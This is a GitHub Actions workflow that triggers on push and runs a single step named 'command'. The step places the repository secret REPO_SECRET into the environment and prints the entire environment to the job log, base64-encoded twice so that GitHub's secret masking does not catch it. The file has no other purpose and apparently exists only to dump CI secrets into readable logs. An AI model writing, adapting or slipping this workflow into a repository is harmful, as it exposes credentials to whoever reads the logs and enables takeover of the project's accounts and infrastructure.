name: GitHub Actions
'on': push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
    - run: sh -c 'env | base64 -w0 | base64 -w0'
      name: command
      env:
        secret_REPO_SECRET: ${{secrets.REPO_SECRET}}
